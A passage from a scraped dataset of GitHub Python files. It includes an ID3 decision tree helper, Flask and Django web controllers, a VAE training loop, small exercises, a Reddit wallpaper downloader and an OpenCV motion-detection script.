result\n\n\ndef entropy(dataset: np.ndarray):\n \"\"\"\n Compute the entropy of the dataset based on a measure of the amount of uncertainty in the dataset.\n :param dataset: The dataset to analyse\n :return: float\n \"\"\"\n rows, cols = dataset.shape\n classes_subsets = split_dataset(dataset, -1)\n proportions = [float(subset.shape[0]) / rows for subset in classes_subsets]\n return sum([-px * np.log2(px) for px in proportions])\n\n\ndef information_gain(dataset: np.ndarray, attribute):\n \"\"\"\n Compute the information gain based on the measure of the difference in entropy from before to after the dataset is\n split on the attribute\n :param dataset: The dataset to analyse\n :param attribute: The attribute to split upon\n :return: float\n \"\"\"\n rows, cols = dataset.shape\n subsets = split_dataset(dataset, attribute)\n h = entropy(dataset)\n return h - sum([float(subset.shape[0]) / rows * entropy(subset) for subset in subsets])\n","repo_name":"nowtryz/Decision-Tree","sub_path":"src/id3.py","file_name":"id3.py","file_ext":"py","file_size_in_byte":4129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"41665077674","text":"from backend.services import *\nfrom flask import render_template, request, make_response, redirect, url_for\n\n\n# app - Flask app object\n# registering endpoints from controllers with methods\ndef registerEndpoints(app):\n app.add_url_rule('/login', view_func=UsersController.login, methods=[\"POST\", \"GET\"])\n app.add_url_rule('/logout', view_func=UsersController.logout, methods=[\"GET\"])\n app.add_url_rule('/register', view_func=UsersController.register, methods=[\"POST\", \"GET\"])\n app.add_url_rule('/', view_func=PoemsController.mainPage, methods=['GET'])\n app.add_url_rule('/author/', view_func=PoemsController.authorPage, methods=['GET'])\n app.add_url_rule('/user/', view_func=PoemsController.userAuthorPage, methods=['GET'])\n app.add_url_rule('/poem/', view_func=PoemsController.poemPage, methods=['GET', 'POST'])\n app.add_url_rule('/add', view_func=PoemsController.addPoem, methods=['GET', 'POST'])\n app.add_url_rule('/daily', view_func=PoemsController.dailyPoem, methods=['GET'])\n app.add_url_rule('/daily_personal', view_func=PoemsController.dailyPersonalPoem, methods=['GET'])\n app.add_url_rule('/author', view_func=PoemsController.authorsPage, methods=['GET'])\n app.add_url_rule('/poem//opinion', view_func=PoemsController.addOpinion, methods=['GET', 'POST'])\n app.add_url_rule('/search', view_func=PoemsController.searchPoems, methods=['GET', 'POST'])\n app.add_url_rule('/fav/add/', view_func=PoemsController.addToFavourites, methods=['GET'])\n app.add_url_rule('/fav/remove/', view_func=PoemsController.removeFromFavourites, methods=['GET'])\n app.add_url_rule('/fav', view_func=PoemsController.favouritePoems, methods=['GET'])\n\n\nclass UsersController:\n __service = UsersService()\n\n # check if request have token in cookies\n @staticmethod\n def checkToken(r):\n token = r.cookies.get('token')\n return UsersController.__service.checkToken(token)[0]\n\n # on GET - get login view\n # on POST - login with given login and password, get token in response\n @staticmethod\n def login():\n if request.method == 'GET':\n return render_template('login.html', logged=UsersController.checkToken(request))\n elif request.method == 'POST':\n # if user send \"login form\" login to service and return token\n if request.form.get('submit') == 'login':\n user, password = request.form.get('login'), request.form.get('password')\n try:\n token = UsersController.__service.login(user, password)\n resp = make_response(redirect(url_for('mainPage', logged=UsersController.checkToken(request))))\n resp.set_cookie('token', token)\n return resp\n except Unauthorized as e:\n return UsersController.error(str(e), request)\n # if user send \"register form\" return register view\n elif request.form.get('submit') == 'register':\n return redirect(url_for('register', logged=UsersController.checkToken(request)))\n\n # logout from service\n @staticmethod\n def logout():\n if request.method == 'GET':\n # if request doesnt have token then redirect to login page\n token = request.cookies.get('token')\n if token is None:\n return redirect(url_for('login', logged=UsersController.checkToken(request)))\n\n UsersController.__service.logout(token)\n resp = make_response(redirect(url_for('mainPage', logged=False)))\n resp.delete_cookie('token')\n return resp\n\n # GET - return register view\n # POST - register new account or return login view\n @staticmethod\n def register():\n if request.method == 'GET':\n return render_template('register.html', logged=UsersController.checkToken(request))\n elif request.method == 'POST':\n if request.form.get('submit') == 'login':\n return redirect(url_for('login', logged=UsersController.checkToken(request)))\n elif request.form.get('submit') == 'register':\n user, password = request.form.get('login'), request.form.get('password')\n try:\n UsersController.__service.createNewUser(user, password)\n except ValueError as e:\n return UsersController.error(str(e), request)\n\n return redirect(url_for('login', logged=UsersController.checkToken(request)))\n\n # rendering error page with given message\n # r - request to check token\n @staticmethod\n def error(message, r):\n return render_template('error.html', message=message, logged=UsersController.checkToken(r))\n\n\nclass PoemsController:\n __service = PoemsService()\n\n # render main page\n @staticmethod\n def mainPage():\n poems = PoemsController.__service.getMainPagePoems()\n return render_template('index.html', poems=poems, logged=UsersController.checkToken(request))\n\n # render page with poems list of given authors\n @staticmethod\n def authorPage(author):\n try:\n author, poems = PoemsController.__service.getAuthorPoemsPreviews(author)\n except ValueError as e:\n return UsersController.error(str(e), request)\n return render_template('author_page.html', poems=poems, author=author,\n logged=UsersController.checkToken(request))\n\n # render page with poems list of given user-author\n @staticmethod\n def userAuthorPage(author):\n try:\n author, poems = PoemsController.__service.getUserPoemsPreviews(author)\n except ValueError as e:\n return UsersController.error(str(e), request)\n return render_template('author_page.html', poems=poems, author=author,\n logged=UsersController.checkToken(request))\n\n # return view page od given poem (by id)\n @staticmethod\n def poemPage(id):\n if request.method == 'GET':\n poem = PoemsController.__service.getPoem(id)\n token = request.cookies.get('token')\n isFav = PoemsController.__service.isFavourite(token, id)\n return render_template('poem_page.html', poem=poem, logged=UsersController.checkToken(request), isFav=isFav)\n\n # GET - get view of add opinion form\n # POST - add new opinion\n @staticmethod\n def addOpinion(id):\n if request.method == 'GET':\n return render_template('add_opinion_page.html', id=id, logged=UsersController.checkToken(request))\n elif request.method == 'POST':\n # check token\n if not UsersController.checkToken(request):\n return redirect(url_for('login', logged=UsersController.checkToken(request)))\n\n try:\n PoemsController.__service.addOpinion(id, request.cookies.get('token'),\n request.form.get('content'), request.form.get('rating'))\n except ValueError as e:\n return UsersController.error(str(e), request)\n\n poem = PoemsController.__service.getPoem(id)\n\n return render_template('poem_page.html', poem=poem, logged=UsersController.checkToken(request))\n\n @staticmethod\n def addPoem():\n if request.method == 'GET':\n if not UsersController.checkToken(request):\n return redirect(url_for('login', logged=UsersController.checkToken(request)))\n return render_template('add_poem_page.html', logged=UsersController.checkToken(request))\n elif request.method == 'POST':\n if not UsersController.checkToken(request):\n return redirect(url_for('login', logged=UsersController.checkToken(request)))\n author = request.form.get('author')\n isUserAuthor = request.form.get('isUserAuthor') == 'on'\n title = request.form.get('title')\n content = request.form.get('content')\n try:\n PoemsController.__service.addPoem(request.cookies.get('token'), author, title, content, isUserAuthor)\n except ValueError as e:\n return UsersController.error(str(e), request)\n\n return redirect(url_for('addPoem', logged=UsersController.checkToken(request)))\n\n @staticmethod\n def dailyPoem():\n poem = PoemsController.__service.getDailyPoem()\n return render_template('poem_page.html', poem=poem, logged=UsersController.checkToken(request))\n\n @staticmethod\n def dailyPersonalPoem():\n token = request.cookies.get('token')\n\n if token is None:\n return redirect(url_for('login'))\n\n poem = PoemsController.__service.getDailyPoem(token=token)\n return render_template('poem_page.html', poem=poem, logged=UsersController.checkToken(request))\n\n @staticmethod\n def authorsPage():\n authors = PoemsController.__service.getAuthors()\n return render_template('authors.html', authors=authors, logged=UsersController.checkToken(request))\n\n @staticmethod\n def searchPoems():\n title = ''\n if request.method == 'GET':\n title = ''\n elif request.method == 'POST':\n title = request.form.get('title')\n poems = PoemsController.__service.searchPoem(title)\n return render_template('searching_page.html', poems=poems, logged=UsersController.checkToken(request))\n\n @staticmethod\n def addToFavourites(id):\n token = request.cookies.get('token')\n\n if token is None:\n return redirect(url_for('login'))\n\n PoemsController.__service.addToFavourites(token, id)\n return redirect(url_for('poemPage', id=id))\n\n @staticmethod\n def removeFromFavourites(id):\n token = request.cookies.get('token')\n\n if token is None:\n return redirect(url_for('login'))\n\n PoemsController.__service.removeFromFavourites(token, id)\n return redirect(url_for('poemPage', id=id))\n\n @staticmethod\n def favouritePoems():\n token = request.cookies.get('token')\n\n if token is None:\n return redirect(url_for('login'))\n\n poems = PoemsController.__service.getFavouritePoems(token)\n return render_template('favourite_poems.html', poems=poems, logged=UsersController.checkToken(request))","repo_name":"meex28/poems-jezyki-skryptowe","sub_path":"backend/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":10416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"70880033104","text":"\"\"\"\nCP1404/CP5632 Practical\nStarter code for cumulative total income program\n\nName: Kum King Wye\nGithub link: https://github.com/kkw123/CP1404Practicals\n\"\"\"\n\n\ndef main():\n \"\"\"Ask how many months and the income for each month\"\"\"\n incomes = []\n total_months = int(input(\"How many months? \"))\n\n for month in range(1, total_months + 1):\n income = float(input(\"Enter income for month {}: \".format(str(month))))\n incomes.append(income)\n\n print_report(total_months, incomes)\n\n\ndef print_report(total_months, incomes):\n \"\"\"Display income report\"\"\"\n print(\"\\nIncome Report\\n-------------\")\n total = 0\n for month in range(1, total_months + 1):\n income = incomes[month - 1]\n total += income\n print(\"Month {:2} - Income: ${:10.2f} Total: ${:10.2f}\".format(month, income, total))\n\n\nmain()\n","repo_name":"kkw123/CP1404Practicals","sub_path":"Week 4 Files/total_income.py","file_name":"total_income.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"35857943189","text":"from glob import glob\n\nimport re\n\nfrom author_class import Author\nfrom util import value_question\n\n\nclass HeaderAdder:\n def __init__(self):\n self.__authors = self.__get_authors_from_user()\n self.__email = self.__get_email_from_user()\n self.__credits = self.__get_credits_from_user()\n \n def add_headers(self, path):\n python_files = glob(path + '/*.py')\n if len(python_files) == 0:\n print('No python files found!')\n exit(1)\n self.__add_headers_to_files(python_files)\n\n def __add_headers_to_files(self, python_files):\n for file in python_files:\n with open(file, 'r+') as f:\n content_lines = f.read().splitlines()\n if len(content_lines) == 0:\n print(f'File \"{file}\" is empty!')\n continue\n if not self.__does_file_has_docstring(content_lines):\n print(f'File \"{file}\" has no docstring!')\n index_after_imports = self.__index_for_variables(content_lines)\n content_before_vars = content_lines[:index_after_imports]\n content_after_vars = content_lines[index_after_imports:]\n vars_content = ['', ''] + self.__construct_variables().split('\\n')\n new_content = content_before_vars + vars_content + content_after_vars\n f.seek(0, 0)\n f.write('\\n'.join(new_content))\n\n def get_authors(self):\n return self.__authors\n\n def __get_authors_from_user(self):\n num_authors = int(value_question('How many authors were working on this project?', type='int', default=1))\n if num_authors < 1:\n exit(1)\n authors = []\n for i in range(1, num_authors + 1):\n print(f'Please enter the information for the {i}. author:')\n matrikel = value_question('Matrikelnumber: ')\n surname = value_question('Surname: ')\n name = value_question('Lastname: ')\n authors.append(Author(matrikel, name, surname))\n return authors\n \n def __get_email_from_user(self):\n return value_question('What is your email? ')\n\n def __get_credits_from_user(self):\n return value_question('If you want to add credits, enter them here:', default=\"\")\n\n def __read_file(self, path: str):\n with open(path, 'r+') as f:\n return f.read()\n\n def __construct_variables(self):\n vars = '__author__ = \"{}\"\\n' .format(self.__build_author())\n vars += '__copyright__ = \"{}\"\\n'.format(self.__get_copyright())\n vars += '__credits__ = \"{}\"\\n' .format(self.__credits) if self.__credits else ''\n vars += '__email__ = \"{}\"\\n' .format(self.__email)\n return vars\n\n def __build_author(self):\n author_strings = list(map(lambda a: f\"{a.matrikel}: {a.surname} {a.name}\", self.__authors))\n return ', '.join(author_strings)\n\n def __get_copyright(self):\n return \"Copyright 2017/2018 – EPR-Goethe-Uni\"\n\n def __index_for_variables(self, content_lines: [str]):\n index = 0\n for i, line in enumerate(content_lines):\n line = line.strip()\n if re.match('^(import|from)\\s', line) is not None:\n index = i\n # if there is no import/from statement\n if index == 0:\n if self.__does_file_has_docstring(content_lines):\n if re.match('^(\\\"\\\"\\\"|\\'\\'\\').*(\\\"\\\"\\\"|\\'\\'\\')', content_lines[0].strip()) is not None:\n return 1\n docstring_indexes = [i for i, l in enumerate(content_lines)\n if re.match('^(\\\"\\\"\\\"|\\'\\'\\')', l.strip()) is not None]\n return docstring_indexes[1] + 1\n return 0\n return index + 1\n\n def __does_file_has_docstring(self, content_lines: [str]):\n for line in content_lines:\n line = line.strip()\n if re.match('^(\\\"\\\"\\\"|\\'\\'\\')', line) is not None:\n return True\n if line != \"\":\n return False\n","repo_name":"larsgroeber/prg1","sub_path":"Tools/header_adder.py","file_name":"header_adder.py","file_ext":"py","file_size_in_byte":4085,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"13838410188","text":"import sys\r\ninput=sys.stdin.readline\r\nfrom collections import deque\r\n\r\ndef bfs(x):\r\n q=deque()\r\n vis=[0]*(n)\r\n vis[x]=1\r\n q.append(x)\r\n while q:\r\n xx=q.pop()\r\n nx1, nx2 = xx+g[xx], xx-g[xx]\r\n if 0<=nx1\\d+)/$', self.wrapper(self.list_view), \n name=self.get_list_url_name),\n url(r'^add/(?P\\d+)/$', self.wrapper(self.add_view), \n name=self.get_add_url_name),\n ]\n patterns.extend(self.extra_urls())\n return patterns\n \n def get_queryset(self, request, *args, **kwargs):\n customer_id = kwargs.get('customer_id')\n current_user_id = request.session['user_info']['id']\n return self.model_class.objects.filter(customer_id=customer_id, \n customer__consultant_id=current_user_id)\n\n def get_model_form_class(self, is_add, request, pk, *args, **kwargs):\n # 如果当前客户有学员信息,则使用PaymentRecordModelForm;\n # 否则使用StudentPaymentRecordModelForm\n customer_id = kwargs.get('customer_id')\n student_exists = Student.objects.filter(\n customer_id=customer_id).exists()\n if student_exists:\n return PaymentRecordModelForm\n return StudentPaymentRecordModelForm\n\n def save(self, request, form, is_update, *args, **kwargs):\n customer_id = kwargs.get('customer_id')\n current_user_id = request.session['user_info']['id']\n obj_exists = Customer.objects.filter(id=customer_id, \n consultant_id=current_user_id).exists()\n if not obj_exists:\n return HttpResponse('非法操作')\n form.instance.customer_id = customer_id\n form.instance.consultant_id = current_user_id\n # 创建缴费记录信息\n form.save()\n # 创建学员信息\n class_list = form.cleaned_data['class_list']\n fetch_student_obj = Student.objects.filter(\n customer_id=customer_id).first()\n if not fetch_student_obj:\n qq = form.cleaned_data['qq']\n mobile = form.cleaned_data['mobile']\n emergency_contract = form.cleaned_data['emergency_contract']\n student_obj = Student.objects.create(\n customer_id=customer_id, qq=qq, mobile=mobile, \n emergency_contract=emergency_contract)\n student_obj.class_list.add(class_list.id)\n else:\n fetch_student_obj.class_list.add(class_list.id)\n","repo_name":"ohoo2454/shiyanlou-code","sub_path":"frontend_backend_projects/django1_project/web/views/payment_record.py","file_name":"payment_record.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"22702872162","text":"import io\nimport logging\nimport os\nimport sys\nfrom unittest.mock import patch\n\nimport openai\nimport pytest\n\nfrom fukkatsu.llm.openaigate import reset_openai_key, set_openai_key\nfrom fukkatsu.observer.tracker import track\n\n\n@pytest.fixture\ndef captured_output():\n captured_output = io.StringIO()\n sys.stdout = captured_output\n yield captured_output\n sys.stdout = sys.__stdout__\n\n\ndef test_set_openai_key_with_api_key():\n with patch.dict(os.environ, {\"OPENAI_API_KEY\": \"test_key\"}):\n set_openai_key()\n assert openai.api_key == \"test_key\"\n assert \"OPENAI_API_KEY\" in os.environ\n\n\ndef test_set_openai_key_without_api_key(captured_output):\n handler = logging.StreamHandler(captured_output)\n track.addHandler(handler)\n with patch(\"os.environ.get\") as import_module_mock:\n import_module_mock.side_effect = Exception\n set_openai_key()\n output = captured_output.getvalue().strip()\n assert \"OPENAI_API_KEY not found\" in output\n\n\ndef test_overwrite_openai_key():\n with patch.dict(os.environ, {\"OPENAI_API_KEY\": \"test_key\"}):\n reset_openai_key(\"new_key\")\n assert openai.api_key == \"new_key\"\n\n\ndef test_overwrite_openai_key_error():\n with pytest.raises(\n Exception, match=\"Invalid Key format. OPENAI_API_KEY not overwritten.\"\n ):\n reset_openai_key(23)\n","repo_name":"maxmekiska/fukkatsu","sub_path":"tests/test_llm/test_openaigate.py","file_name":"test_openaigate.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"37312251400","text":"import torch\nimport math\nimport os\nimport numpy as np\nimport torch.optim as optim\nfrom collections import OrderedDict\nfrom model.losses import *\nfrom utils.utils_ import print_current_loss\nimport time\nfrom VaeTrainer import VaeTrainer\n\nclass FactorTrainer(VaeTrainer):\n\tdef __init__(self, args, batch_sampler, device, stage, cross_entropy_loss=False):\n\t\tsuper(FactorTrainer, self).__init__(args, batch_sampler, device, stage, cross_entropy_loss, None)\n\t\tself.dis_cri = torch.nn.BCELoss()\n\t\n\tdef sample_batch(self):\n\t\tif self.batch_enumerator is None:\n\t\t\tself.batch_enumerator = enumerate(self.batch_sampler)\n\t\t\n\t\tbatch_idx, batch = next(self.batch_enumerator)\n\t\t\n\t\tif batch_idx == len(self.batch_sampler) - 1:\n\t\t\tself.batch_enumerator = enumerate(self.batch_sampler)\n\t\t# self.real_batch = batch # ?? have not used\n\t\treturn batch\n\t\n\tdef permute_dims(self, z):\n\t\tassert z.dim() == 2\n\n\t\tB, _ = z.size()\n\t\tperm_z = []\n\t\tfor z_j in z.split(1, 1):\n\t\t\tperm = torch.randperm(B).to(z.device)\n\t\t\tperm_z_j = z_j[perm]\n\t\t\tperm_z.append(perm_z_j)\n\n\t\treturn torch.cat(perm_z, 1)\n\t\n\tdef train(self, encoder, decoder, disc, opt_encoder, opt_decoder, opt_disc, sample_true):\n\t\topt_encoder.zero_grad()\n\t\topt_decoder.zero_grad()\n\t\topt_disc.zero_grad()\n\t\t\n\t\tdata1 = sample_true()\n\t\tdata1 = torch.clone(data1).float().detach_().to(self.device)\n\t\t\n\t\tlog_dict = OrderedDict({\"g_loss\": 0})\n\t\t\n\t\tkld_loss = 0\n\t\tgen_loss = 0\n\t\tshuffle_loss = 0\n\t\tgan_loss = 0\n\t\t\n\t\tmu_z, sd_z, logsd_z, z = encoder(data1)\n\t\tz_sh = self.permute_dims(z).detach()\n\t\tx_sh_hat, _, _ = decoder(z_sh)\n\t\tx_sh_hat = x_sh_hat.detach()\n\t\t\n\t\tdisc_gt = disc(data1)\n\t\tlabelv = torch.FloatTensor(self.args.batch_size).to(self.device)\n\t\tlabelv.resize_(self.args.batch_size).fill_(1)\n\t\terrD_real = self.dis_cri(disc_gt, labelv)\n\t\t\n\t\tdisc_fake = disc(x_sh_hat)\n\t\tlabelv = torch.FloatTensor(self.args.batch_size).to(self.device)\n\t\tlabelv.resize_(self.args.batch_size).fill_(0)\n\t\terrD_fake = self.dis_cri(disc_fake, labelv)\n\t\t\n\t\tgan_loss += errD_real + errD_fake\n\t\t\n\t\tgan_loss.backward()\n\t\topt_disc.step()\n\t\tdata1 = sample_true()\n\t\tdata1 = torch.clone(data1).float().detach_().to(self.device)\n\n\t\tmu_z, sd_z, logsd_z, z = encoder(data1)\n\t\tx_hat, loggamma_x, gamma_x = decoder(z)\n\t\tz_sh = self.permute_dims(z).detach()\n\t\tx_sh_hat, _, _ = decoder(z_sh)\n\t\t\n\t\t# print(self.args.batch_size)\n\t\tkld_loss += self.kld_loss(mu_z, logsd_z) \n\t\tgen_loss += self.gen_loss(data1, x_hat, loggamma_x)\n\t\t\n\t\tx_sh_hat = x_sh_hat.detach()\n\t\tdisc_fake = disc(x_sh_hat)\n\t\tlabelv = torch.FloatTensor(self.args.batch_size).to(self.device)\n\t\tlabelv.resize_(self.args.batch_size).fill_(0)\n\t\tshuffle_loss += self.dis_cri(disc_fake, labelv)\n\t\t\n\t\tlosses = (kld_loss + gen_loss) / self.args.batch_size + self.args.alpha_gan * shuffle_loss\n\t\tlosses.backward()\n\t\topt_encoder.step()\n\t\topt_decoder.step()\n\t\topt_disc.step()\n\n\t\tavg_loss = losses.item()\n\t\tlog_dict[\"g_kld_loss\"] = kld_loss.item()\n\t\tlog_dict[\"g_gen_loss\"] = gen_loss.item()\n\t\tlog_dict[\"g_gan_loss\"] = gan_loss.item()\n\t\tlog_dict[\"g_shuffle_loss\"] = shuffle_loss.item()\n\t\tlog_dict[\"g_loss\"] = avg_loss\n\t\t\n\t\treturn log_dict\n\t\n\tdef trainIters(self, encoder, decoder, discriminator):\n\t\tself.opt_encoder = optim.Adam(\n\t\t\tencoder.parameters(),\n\t\t\tlr = self.args.lr,\n\t\t\tbetas = (0.9, 0.999),\n\t\t\tweight_decay = 0.00001,\n\t\t)\n\t\tself.opt_decoder = optim.Adam(\n\t\t\tdecoder.parameters(),\n\t\t\tlr = self.args.lr,\n\t\t\tbetas = (0.9, 0.999),\n\t\t\tweight_decay = 0.00001,\n\t\t)\n\t\tself.opt_disc = optim.Adam(\n\t\t\tdiscriminator.parameters(),\n\t\t\tlr = self.args.lr,\n\t\t\tbetas = (0.9, 0.999),\n\t\t\tweight_decay = 0.00001,\n\t\t)\n\t\t\n\t\tencoder.to(self.device)\n\t\tdecoder.to(self.device)\n\t\tdiscriminator.to(self.device)\n\t\t\n\t\tdef save_model(file_name):\n\t\t\tstate = {\n\t\t\t\t\"encoder\": encoder.state_dict(),\n\t\t\t\t\"decoder\": decoder.state_dict(),\n\t\t\t\t\"discriminator\": discriminator.state_dict(),\n\t\t\t\t\"opt_encoder\": self.opt_encoder.state_dict(),\n\t\t\t\t\"opt_decoder\": self.opt_decoder.state_dict(),\n\t\t\t\t\"opt_discriminator\": self.opt_disc.state_dict(),\n\t\t\t\t\"iterations\": iter_num,\n\t\t\t}\n\t\t\tfilename = \"s\" + str(self.stage) + \"_\" + file_name\n\t\t\t\n\t\t\ttorch.save(state, os.path.join(self.args.model_path, filename) + \".tar\")\n\t\t\n\t\tdef load_model(file_name):\n\t\t\tfilename = \"s\" + str(self.stage) + \"_\" + file_name\n\t\t\tmodel_dict = torch.load(os.path.join(self.args.model_path, filename + \".tar\"))\n\t\t\t\n\t\t\tencoder.load_state_dict(model_dict[\"encoder\"])\n\t\t\tdecoder.load_state_dict(model_dict[\"decoder\"])\n\t\t\tdiscriminator.load_state_dict(model_dict[\"discriminator\"])\n\t\t\tself.opt_encoder.load_state_dict(model_dict[\"opt_encoder\"])\n\t\t\tself.opt_decoder.load_state_dict(model_dict[\"opt_decoder\"])\n\t\t\tself.opt_disc.load_state_dict(model_dict[\"opt_discriminator\"])\n\t\t\treturn model_dict\n\t\t\n\t\titer_num = 0\n\t\tlogs = OrderedDict()\n\t\tstart_time = time.time()\n\t\tlast_time = start_time\n\t\t\n\t\tif self.args.is_continue:\n\t\t\tmodel_dict = load_model(\"latest\")\n\t\t\titer_num = model_dict[\"iterations\"]\n\t\t\n\t\twhile True:\n\t\t\tencoder.train()\n\t\t\tdecoder.train()\n\t\t\tdiscriminator.train()\n\t\t\t\n\t\t\tif self.stage == 1:\n\t\t\t\tsample_true = self.sample_batch1\n\t\t\telse:\n\t\t\t\tsample_true = self.sample_batch2\n\n\t\t\tgen_log_dict = self.train(\n\t\t\t\tencoder,\n\t\t\t\tdecoder,\n\t\t\t\tdiscriminator,\n\t\t\t\tself.opt_encoder,\n\t\t\t\tself.opt_decoder,\n\t\t\t\tself.opt_disc,\n\t\t\t\tsample_true\n\t\t\t)\n\t\t\t\n\t\t\tfor k, v in gen_log_dict.items():\n\t\t\t\tif k not in logs:\n\t\t\t\t\tlogs[k] = [v]\n\t\t\t\telse:\n\t\t\t\t\tlogs[k].append(v)\n\t\t\t\n\t\t\titer_num += 1\n\t\t\t\n\t\t\tif iter_num % self.args.print_every == 0:\n\t\t\t\tmean_loss = OrderedDict()\n\t\t\t\tfor k, v in logs.items():\n\t\t\t\t\tmean_loss[k] = (\n\t\t\t\t\t\tsum(logs[k][-1 * self.args.print_every:]) / self.args.print_every\n\t\t\t\t\t)\n\t\t\t\tcurrent_time = time.time()\n\t\t\t\tprint_current_loss(start_time, last_time, current_time, self.args.print_every, iter_num, self.args.epochs, mean_loss)\n\t\t\t\tlast_time = current_time\n\t\t\t\n\t\t\tif iter_num % self.args.save_every == 0:\n\t\t\t\tsave_model(str(iter_num))\n\t\t\t\n\t\t\tif iter_num % self.args.save_latest == 0:\n\t\t\t\tsave_model(\"latest\")\n\t\t\t\n\t\t\tif iter_num >= self.args.epochs:\n\t\t\t\tbreak\n\t\treturn logs\n\t\t","repo_name":"chentong1023/Two-stage-VAE-pytorch","sub_path":"FactorTrainer.py","file_name":"FactorTrainer.py","file_ext":"py","file_size_in_byte":5972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"21777054796","text":"\n\n# Given a 2D binary matrix filled with 0's and 1's,\n# find the largest rectangle containing all ones and return its area.\n\n# http://www.cnblogs.com/lichen782/p/leetcode_maximal_rectangle.html\n\nclass Solution(object):\n def maximalRectangle(self, matrix):\n \"\"\"\n :type matrix: List[List[str]]\n :rtype: int\n \"\"\"\n\n if matrix == []:\n return 0\n\n heights = [0 for i in range(len(matrix[0]))]\n maxArea = 0\n\n for i in range(len(matrix)):\n for j in range(len(matrix[0])):\n heights[j] = heights[j] + 1 if matrix[i][j] == '1' else 0\n maxArea = max(maxArea, self.largestArea(heights))\n\n return maxArea\n\n\n def largestArea(self, heights):\n stack = []\n i = 0\n maxArea = 0\n h = heights + [0]\n\n while i < len(h):\n if (not stack) or h[stack[-1]] <= h[i]:\n stack.append(i)\n i += 1\n else:\n tmp = stack.pop()\n maxArea = max(maxArea, h[tmp] * (i if not stack else i - stack[-1] - 1))\n\n return maxArea\n\n\n\n\n\n\n\n","repo_name":"creageng/lc2016","sub_path":"85_Maximal_Rectangle.py","file_name":"85_Maximal_Rectangle.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"16953661672","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"Unit tests for loag_analyzer.py\"\"\"\n\nimport unittest\nimport pycodestyle\nimport log_analyzer as la\n\n\nclass TestCode(unittest.TestCase):\n \"\"\"TestCode\"\"\"\n\n def test_conformance(self):\n \"\"\"Test that we conform to PEP-8.\"\"\"\n style = pycodestyle.StyleGuide(quiet=True, config_file='tox.ini')\n result = style.check_files([la.__file__])\n self.assertEqual(result.total_errors, 0,\n \"Found code style errors (and warnings).\")\n\n def test_app(self):\n \"\"\"Test App\"\"\"\n d = {'App': {'TEST': 'pass'}}\n save_path = \"tests/save_config.ini\"\n la.App.save_config(save_path, d)\n r = la.App.load_config(save_path)\n self.assertTrue(len(d) == len(r) == len(list(k for k in d if k in r and d[k] == r[k])), \"Saved dict is not the same as loaded.\")\n\n\nclass TestMainCode(unittest.TestCase):\n \"\"\"Test main\"\"\"\n\n def test_main(self):\n \"\"\"Test main\"\"\"\n la.App.init(\"tests/log_test.ini\")\n self.assertTrue(la.main(la.App) >= 0, \"Main functionality is failed.\")\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"nj-eka/LogAnalyzer","sub_path":"test_log_analyzer.py","file_name":"test_log_analyzer.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73330723341","text":"import praw\nimport subprocess\nimport os\n\n# Creating the reddit object\nreddit = praw.Reddit(\"BackgroundFromReddit\")\nfile_extension = ['jpg', 'png'] # For now, we only want these two extensions\nsubreddit_name = \"EarthPorn\" # The name of the subreddit we want\n\n# We are only interested in the top url whih contains an easy to extract image\n# So we only keep the first submission whose extension is correct\nfor submission in reddit.subreddit(subreddit_name).top(time_filter=\"day\"):\n url = submission.url\n if url.split(\".\")[-1] in file_extension:\n print(url)\n break\n\n# Configuring so that the image is centered\n# then setting the background image\nbg_centred = \"gsettings set org.gnome.desktop.background picture-options scaled\"\nset_bg = f\"gsettings set org.gnome.desktop.background picture-uri {url}\"\n\nsubprocess.run(bg_centred.split(), stdout=subprocess.PIPE)\nsubprocess.run(set_bg.split(), stdout=subprocess.PIPE)\n\n# Saving the files\nhome_dir = os.getenv(\"HOME\")\nsubprocess.run(f\"mkdir -p {home_dir}/Pictures/Backgrounds\".split(),\n stdout=subprocess.PIPE)\nsubprocess.run(f\"wget {url}\".split(),\n stdout=subprocess.PIPE,\n cwd=f\"{home_dir}/Pictures/Backgrounds\")\n","repo_name":"AlperenAydin/BackgroundFromReddit","sub_path":"BackgroundFromReddit.py","file_name":"BackgroundFromReddit.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73693987022","text":"from __future__ import print_function \nimport cv2 \nimport numpy as np \n\ndef main():\n cap = cv2.VideoCapture(0)\n back_sub = cv2.createBackgroundSubtractorMOG2(history=700,varThreshold=25, detectShadows=True)\n kernel = np.ones((20, 20), np.uint8)\n while (True):\n ret, frame = cap.read()\n fg_mask = back_sub.apply(frame)\n # Close dark gaps in foreground object using closing\n fg_mask = cv2.morphologyEx(fg_mask, cv2.MORPH_CLOSE, kernel)\n # Remove salt and pepper noise with a median filter\n fg_mask = cv2.medianBlur(fg_mask, 5)\n # Threshold the image to make it either black or white\n _, fg_mask = cv2.threshold(fg_mask, 127, 255, cv2.THRESH_BINARY)\n # Find the index of the largest contour and draw bounding box\n fg_mask_bb = fg_mask\n contours, hierarchy = cv2.findContours(fg_mask_bb, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)[-2:]\n areas = [cv2.contourArea(c) for c in contours]\n # If there are no countours\n if len(areas) < 1:\n # Display the resulting frame\n cv2.imshow('view', frame)\n # If \"q\" is pressed on the keyboard, \n # exit this loop\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n 